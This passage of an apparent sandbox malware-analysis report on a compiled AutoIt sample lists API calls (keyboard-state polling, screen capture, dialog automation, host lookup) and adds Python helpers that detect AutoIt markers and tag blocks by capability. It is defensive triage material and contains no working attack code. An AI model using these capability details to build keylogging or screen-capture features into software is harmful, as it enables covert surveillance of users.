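    # Usage: python au3_markers.py <file>
    with open(sys.argv[1], "rb") as fh:
        blob = fh.read()
    print(classify(blob))
    for marker, offsets in find_markers(blob).items():
        print(f"{marker}: {[hex(o) for o in offsets]}")
```

A compiled AutoIt executable such as this sample will hit on all three markers: the loader strings from the interpreter code plus the script header in its resource section. The offset of the header is where the script resource begins; recovering the script itself needs an AutoIt decompiler, which this check does not attempt.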
                                            APIs
                                            • _memset.LIBCMT ref: 00E145F9
                                            • GetMenuItemCount.USER32(00ED6890), ref: 00E4D7CD
                                            • GetMenuItemCount.USER32(00ED6890), ref: 00E4D87D
                                            • GetCursorPos.USER32(?), ref: 00E4D8C1
                                            • SetForegroundWindow.USER32(00000000), ref: 00E4D8CA
                                            • TrackPopupMenuEx.USER32(00ED6890,00000000,?,00000000,00000000,00000000), ref: 00E4D8DD
                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E4D8E9
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                            • String ID:
                                            • API String ID: 2751501086-0
                                            • Opcode ID: b1285af7602d3c6d0c9c990c45a5ae723f31e65af69bdb1a8489f4c38b3c0907
                                            • Instruction ID: d022c471e8a18e698f72ed50f06c87111654b378e13967cea81fa697bb114445
                                            • Opcode Fuzzy Hash: b1285af7602d3c6d0c9c990c45a5ae723f31e65af69bdb1a8489f4c38b3c0907
                                            • Instruction Fuzzy Hash: 0571C170605205BEEB218F65EC49FEABFA4FF05368F205217F519B62E1C7B16860DB90
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 00E88BEC
                                            • CoInitialize.OLE32(00000000), ref: 00E88C19
                                            • CoUninitialize.OLE32 ref: 00E88C23
                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00E88D23
                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E88E50
                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00EA2C0C), ref: 00E88E84
                                            • CoGetObject.OLE32(?,00000000,00EA2C0C,?), ref: 00E88EA7
                                            • SetErrorMode.KERNEL32(00000000), ref: 00E88EBA
                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E88F3A
                                            • VariantClear.OLEAUT32(?), ref: 00E88F4A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                            • String ID: ,,
                                            • API String ID: 2395222682-1556401989
                                            • Opcode ID: 6a8cfeca95fb087e623b0fef40111992e42b2679976d7e812daccdc27d87733b
                                            • Instruction ID: a1a78776c6ae61fdd0d279c660a14d99747ea137ae7f2bcfd1f7d21214b3754a
                                            • Opcode Fuzzy Hash: 6a8cfeca95fb087e623b0fef40111992e42b2679976d7e812daccdc27d87733b
                                            • Instruction Fuzzy Hash: 66C13371608305AFC704EF64C98496BB7E9BF88348F00592DF98AEB261DB31ED05CB52
                                            APIs
                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E90038,?,?), ref: 00E910BC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BuffCharUpper
                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                            • API String ID: 3964851224-909552448
                                            • Opcode ID: 8a4c70a58204f93521b7e149f80d8363231d38956f8b28c60ae98feb1f2b6bd7
                                            • Instruction ID: 92a78443be85e7aa033cfa0a5838ecbe5267d0a45e45f39c70486653fa8a2273
                                            • Opcode Fuzzy Hash: 8a4c70a58204f93521b7e149f80d8363231d38956f8b28c60ae98feb1f2b6bd7
                                            • Instruction Fuzzy Hash: 9B415C3014124BDBCF10EF90D9A6AEB37B8AF51304F516499FC917B291DB31A95ACB50
                                            APIs
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                              • Part of subcall function 00E17A84: _memmove.LIBCMT ref: 00E17B0D
                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E755D2
                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E755E8
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E755F9
                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E7560B
                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E7561C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: SendString$_memmove
                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                            • API String ID: 2279737902-1007645807
                                            • Opcode ID: e029c3a029a76577f66398873eac7f8822509676ca9a445ff7a3b0c820675849
                                            • Instruction ID: 69731b1b0a7267eb59a9b6ed7e8e8f80e322a1f0ef6e46be4b2789c77f68a65d
                                            • Opcode Fuzzy Hash: e029c3a029a76577f66398873eac7f8822509676ca9a445ff7a3b0c820675849
                                            • Instruction Fuzzy Hash: AA11C4316502AD79D720B6A5CC5AEFFBBBCEF91F04F44242EB415B20D1DEA10D46C5A1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                            • String ID: 0.0.0.0
                                            • API String ID: 208665112-3771769585
                                            • Opcode ID: 4ae7d6b0ae8fb6d06a8c9ff5f9570badba68c686b46ae644e3d4a8667ec28f2f
                                            • Instruction ID: d57c8d7e7534988f8e7bda1d9ff707d68f4606fed448ff776d74c6b66ff396ba
                                            • Opcode Fuzzy Hash: 4ae7d6b0ae8fb6d06a8c9ff5f9570badba68c686b46ae644e3d4a8667ec28f2f
                                            • Instruction Fuzzy Hash: 2B11F371A04115AFCB24AB649C0AEDB7BEC9F40710F0451BBF648F2091EF719A85CA51
                                            APIs
                                            • timeGetTime.WINMM ref: 00E7521C
                                              • Part of subcall function 00E30719: timeGetTime.WINMM(?,75A4B400,00E20FF9), ref: 00E3071D
                                            • Sleep.KERNEL32(0000000A), ref: 00E75248
                                            • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00E7526C
                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E7528E
                                            • SetActiveWindow.USER32 ref: 00E752AD
                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E752BB
                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E752DA
                                            • Sleep.KERNEL32(000000FA), ref: 00E752E5
                                            • IsWindow.USER32 ref: 00E752F1
                                            • EndDialog.USER32(00000000), ref: 00E75302
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                            • String ID: BUTTON
                                            • API String ID: 1194449130-3405671355
                                            • Opcode ID: 266a61d233cdf0945a906d2987ce58a85af1c732e89884a20e56a8094746e22a
                                            • Instruction ID: 0e5dc1cf6282dcb6dc472f9988d725fd11a478279ef7639f28fba966b5723bef
                                            • Opcode Fuzzy Hash: 266a61d233cdf0945a906d2987ce58a85af1c732e89884a20e56a8094746e22a
                                            • Instruction Fuzzy Hash: CC21C672205704BFE7005B72FD89B253B6AEB4434AF00643BF409F11B6EBB19C189B62
                                            APIs
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            • CoInitialize.OLE32(00000000), ref: 00E7D855
                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E7D8E8
                                            • SHGetDesktopFolder.SHELL32(?), ref: 00E7D8FC
                                            • CoCreateInstance.OLE32(00EA2D7C,00000000,00000001,00ECA89C,?), ref: 00E7D948
                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E7D9B7
                                            • CoTaskMemFree.OLE32(?,?), ref: 00E7DA0F
                                            • _memset.LIBCMT ref: 00E7DA4C
                                            • SHBrowseForFolderW.SHELL32(?), ref: 00E7DA88
                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E7DAAB
                                            • CoTaskMemFree.OLE32(00000000), ref: 00E7DAB2
                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00E7DAE9
                                            • CoUninitialize.OLE32(00000001,00000000), ref: 00E7DAEB
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                            • String ID:
                                            • API String ID: 1246142700-0
                                            • Opcode ID: 46e0f00f927d2793b197f8c02b2fb16db202e75c3d4f153e29f16d4f747cf044
                                            • Instruction ID: 1fafbc046a99717fd96ee33fb9a8c591deacc667baede6051d6fdadbd9af6416
                                            • Opcode Fuzzy Hash: 46e0f00f927d2793b197f8c02b2fb16db202e75c3d4f153e29f16d4f747cf044
                                            • Instruction Fuzzy Hash: 6DB1FA75A00119AFDB14DFA4C889DAEBBF9FF88304B149469F50AEB251DB30ED45CB50
                                            APIs
                                            • GetKeyboardState.USER32(?), ref: 00E705A7
                                            • SetKeyboardState.USER32(?), ref: 00E70612
                                            • GetAsyncKeyState.USER32(000000A0), ref: 00E70632
                                            • GetKeyState.USER32(000000A0), ref: 00E70649
                                            • GetAsyncKeyState.USER32(000000A1), ref: 00E70678
                                            • GetKeyState.USER32(000000A1), ref: 00E70689
                                            • GetAsyncKeyState.USER32(00000011), ref: 00E706B5
                                            • GetKeyState.USER32(00000011), ref: 00E706C3
                                            • GetAsyncKeyState.USER32(00000012), ref: 00E706EC
                                            • GetKeyState.USER32(00000012), ref: 00E706FA
                                            • GetAsyncKeyState.USER32(0000005B), ref: 00E70723
                                            • GetKeyState.USER32(0000005B), ref: 00E70731
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: State$Async$Keyboard
                                            • String ID:
                                            • API String ID: 541375521-0
                                            • Opcode ID: f21b0fed5529de5f49d8c5562133ad6171e97a95358c2cd2a856d7d5925e5d65
                                            • Instruction ID: db707b1f255c14050a1bbb2f103bcbcc1d3ae0cf69da3c933ceeb7be6c872de8
                                            • Opcode Fuzzy Hash: f21b0fed5529de5f49d8c5562133ad6171e97a95358c2cd2a856d7d5925e5d65
                                            • Instruction Fuzzy Hash: 1C510C20A0478459FB35EBB088547EABFF49F01384F08D59ED5CA7A5C2DA649B8CCF52
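                                            The screen-capture block above (GetDC, CreateCompatibleBitmap, StretchBlt with SRCCOPY, GetDIBits), the dialog-automation block (FindWindowExW on a BUTTON class, SendMessageW, EndDialog) and this keyboard-state block are all routines of the same module at 00E10000, whose strings (">>>AUTOIT SCRIPT<<<", "#include depth exceeded", "Bad directive syntax error") mark it as the AutoIt interpreter. An API set found there therefore shows what the runtime can do on a script's behalf, not what this sample's embedded script actually does; that has to come from the script or from the behavioural signatures. The following added example, which is not Joe Sandbox code, parses call lines in this report's format, tags each block by the APIs it calls directly (subcall lines are excluded), and names the Windows constants the listing prints as raw hex: 0xA0 VK_LSHIFT, 0xA1 VK_RSHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU, 0x5B VK_LWIN, 0xF5 BM_CLICK, 0x10 WM_CLOSE and 0x00CC0020 SRCCOPY. The sample lines are copied from the blocks above; the rule table and its tag names are the example's own assumptions.

```python
"""Capability triage over API-call listings in the format this report uses
("Api.MODULE(arg,...), ref: ADDR").  Added example for this page; not Joe
Sandbox code.  The RULES table is the example's own assumption."""
import re
from typing import Dict, List, Tuple

# Constructed excerpt: three blocks copied in the report's line format.
SAMPLE_REPORT = """
APIs
• GetDC.USER32(00000000), ref: 00E876A2
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E876AE
• CreateCompatibleDC.GDI32(?), ref: 00E876BA
• SelectObject.GDI32(00000000,?), ref: 00E876C7
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E8771B
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E87757
• ReleaseDC.USER32(00000000,?), ref: 00E8779E
APIs
  • Part of subcall function 00E30719: timeGetTime.WINMM(?,75A4B400,00E20FF9), ref: 00E3071D
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E7528E
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E752BB
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00E752DA
APIs
• GetKeyboardState.USER32(?), ref: 00E705A7
• GetAsyncKeyState.USER32(000000A0), ref: 00E70632
• GetAsyncKeyState.USER32(00000011), ref: 00E706B5
• GetAsyncKeyState.USER32(0000005B), ref: 00E70723
"""

# One call per line: name.MODULE, optional (args), optional comma, ref: addr.
LINE_RE = re.compile(
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# A block gets a tag when it directly calls every API in the set (assumed rules).
RULES: Dict[str, set] = {
    "screen-capture": {"GetDC", "CreateCompatibleBitmap", "StretchBlt", "GetDIBits"},
    "gui-automation": {"FindWindowExW", "SendMessageW"},
    "keyboard-state-polling": {"GetAsyncKeyState", "GetKeyboardState"},
    "host-address-lookup": {"gethostname", "gethostbyname", "inet_ntoa"},
}

# Documented Windows constants that the listing shows as bare hex.
VK_NAMES = {0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL",
            0x12: "VK_MENU", 0x5B: "VK_LWIN"}
MSG_NAMES = {0x00F5: "BM_CLICK", 0x0010: "WM_CLOSE"}
ROP_NAMES = {0x00CC0020: "SRCCOPY"}

Call = Tuple[str, str, List[str], bool]  # api, module, args, is_subcall


def parse_blocks(text: str) -> List[List[Call]]:
    """Split the text at its 'APIs' headers and collect the calls under each."""
    blocks: List[List[Call]] = []
    current = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        m = LINE_RE.search(line)
        if m is not None and current is not None:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            current.append((m.group("api"), m.group("module"), args, "subcall" in line))
    return blocks


def _hex(arg: str):
    """Arguments are 8-digit hex; '?' and literals such as BUTTON are not."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def annotate(api: str, args: List[str]) -> List[str]:
    """Name the constants in a call, only where the argument position is certain
    (the listing sometimes drops arguments, as the 3-argument SendMessageW shows)."""
    vals = [_hex(a) for a in args]
    if api in ("GetAsyncKeyState", "GetKeyState") and vals and vals[0] in VK_NAMES:
        return [VK_NAMES[vals[0]]]
    if api == "SendMessageW" and len(vals) == 4 and vals[1] in MSG_NAMES:
        return [MSG_NAMES[vals[1]]]
    if api == "StretchBlt" and len(vals) == 11 and vals[10] in ROP_NAMES:
        return [ROP_NAMES[vals[10]]]
    return []


def tag_blocks(text: str) -> List[dict]:
    """Per block: APIs called directly, capability tags satisfied, named constants."""
    out = []
    for calls in parse_blocks(text):
        apis = {api for api, _, _, sub in calls if not sub}
        tags = sorted(t for t, need in RULES.items() if need <= apis)
        notes = sorted({n for api, _, args, _ in calls for n in annotate(api, args)})
        out.append({"apis": apis, "tags": tags, "notes": notes})
    return out


if __name__ == "__main__":
    for i, summary in enumerate(tag_blocks(SAMPLE_REPORT)):
        print(f"block {i}: tags={summary['tags']} constants={summary['notes']}")
```

Run against a whole report, the tags point an analyst at the interpreter built-ins worth tracing (the screen-capture and keyboard-polling routines here), while the named constants make the argument listing readable without a lookup. Because every compiled AutoIt binary carries the same runtime, a tag on this module is a capability of the interpreter; what the script invokes is a separate question.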
                                            APIs
                                            • GetDlgItem.USER32(?,00000001), ref: 00E6C746
                                            • GetWindowRect.USER32(00000000,?), ref: 00E6C758
                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E6C7B6
                                            • GetDlgItem.USER32(?,00000002), ref: 00E6C7C1
                                            • GetWindowRect.USER32(00000000,?), ref: 00E6C7D3
                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E6C827
                                            • GetDlgItem.USER32(?,000003E9), ref: 00E6C835
                                            • GetWindowRect.USER32(00000000,?), ref: 00E6C846
                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E6C889
                                            • GetDlgItem.USER32(?,000003EA), ref: 00E6C897
                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E6C8B4
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00E6C8C1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$ItemMoveRect$Invalidate
                                            • String ID:
                                            • API String ID: 3096461208-0
                                            • Opcode ID: bea3cc45ec25fb362aec595f696c4a95debc3d0bc9a164990d4a747b392ad7b9
                                            • Instruction ID: 9dfda37272fa18f78d22fc98ceaa5b88b5b8a44ecca27d23b1e1e7061adc3ec6
                                            • Opcode Fuzzy Hash: bea3cc45ec25fb362aec595f696c4a95debc3d0bc9a164990d4a747b392ad7b9
                                            • Instruction Fuzzy Hash: 67515371B00205AFDB18CFA9DD85A6DBBB5EB88310F14812EF515E7291D770AD44CB50
                                            APIs
                                              • Part of subcall function 00E11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E12036,?,00000000,?,?,?,?,00E116CB,00000000,?), ref: 00E11B9A
                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E120D3
                                            • KillTimer.USER32(-00000001,?,?,?,?,00E116CB,00000000,?,?,00E11AE2,?,?), ref: 00E1216E
                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00E4BEF6
                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E116CB,00000000,?,?,00E11AE2,?,?), ref: 00E4BF27
                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E116CB,00000000,?,?,00E11AE2,?,?), ref: 00E4BF3E
                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E116CB,00000000,?,?,00E11AE2,?,?), ref: 00E4BF5A
                                            • DeleteObject.GDI32(00000000), ref: 00E4BF6C
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                            • String ID:
                                            • API String ID: 641708696-0
                                            • Opcode ID: 79f49353e98a48da60d100520d3f8c0f82da5d5858b4ccf994015a08e7030e89
                                            • Instruction ID: 5aa7d416b238c412097ac1b37b0c657deb3e01be1396c1b8d32f93b9e8a04fa7
                                            • Opcode Fuzzy Hash: 79f49353e98a48da60d100520d3f8c0f82da5d5858b4ccf994015a08e7030e89
                                            • Instruction Fuzzy Hash: 7561AE34201600EFCB25DF15ED48BA977F1FB44319F10652EE642B69A0C775A8A9DF80
                                            APIs
                                              • Part of subcall function 00E125DB: GetWindowLongW.USER32(?,000000EB), ref: 00E125EC
                                            • GetSysColor.USER32(0000000F), ref: 00E121D3
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ColorLongWindow
                                            • String ID:
                                            • API String ID: 259745315-0
                                            • Opcode ID: d5161c90268dbe1c29eb8399011ffd7ec46a813caf2ead5efa06135a1bc7e60c
                                            • Instruction ID: 0729537b39e702f6b522b552416a7bc55abf0ee06a00980026ce195c1bfc405b
                                            • Opcode Fuzzy Hash: d5161c90268dbe1c29eb8399011ffd7ec46a813caf2ead5efa06135a1bc7e60c
                                            • Instruction Fuzzy Hash: 2341B1311011409FDB255F29EC48BFD3765EB06325F28526AFE65AB2F2C7318C92DB51
                                            APIs
                                            • CharLowerBuffW.USER32(?,?,00E9F910), ref: 00E7AB76
                                            • GetDriveTypeW.KERNEL32(00000061,00ECA620,00000061), ref: 00E7AC40
                                            • _wcscpy.LIBCMT ref: 00E7AC6A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BuffCharDriveLowerType_wcscpy
                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                            • API String ID: 2820617543-1000479233
                                            • Opcode ID: 9b479d9777a4b32b555306fc5eedfcb55f94b16c000214e683f94cdddf024eb0
                                            • Instruction ID: cc5c82b4f1272d7b88da317a875c73760977b34a209daf818a53ef59a9b13e0a
